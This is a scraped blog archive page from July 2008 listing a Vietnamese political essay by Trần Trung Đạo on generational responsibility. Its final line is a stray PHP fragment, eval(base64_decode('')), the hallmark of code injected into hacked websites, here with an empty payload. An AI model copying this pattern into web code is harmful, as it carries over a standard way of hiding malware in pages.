Archive for July 8th, 2008

Trần Trung Đạo: Trách nhiệm của các thế hệ Việt Nam

Trần Trung Đạo: Trách nhiệm của các thế hệ Việt Nam

(Vài suy nghĩ sau khi đọc tiểu luận “Nhà văn Việt Nam: Đổi mới và Hội nhập” của nhà văn Tô Nhuận Vỹ và tự truyện Lạc đường của nhà văn Đào Hiếu) Tháng 2 năm 2007, trên diễn đàn talawas, tôi có viết một bài để góp ý với ô

07.8.2008 | Tiểu Luận- Chính Luận |

17 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>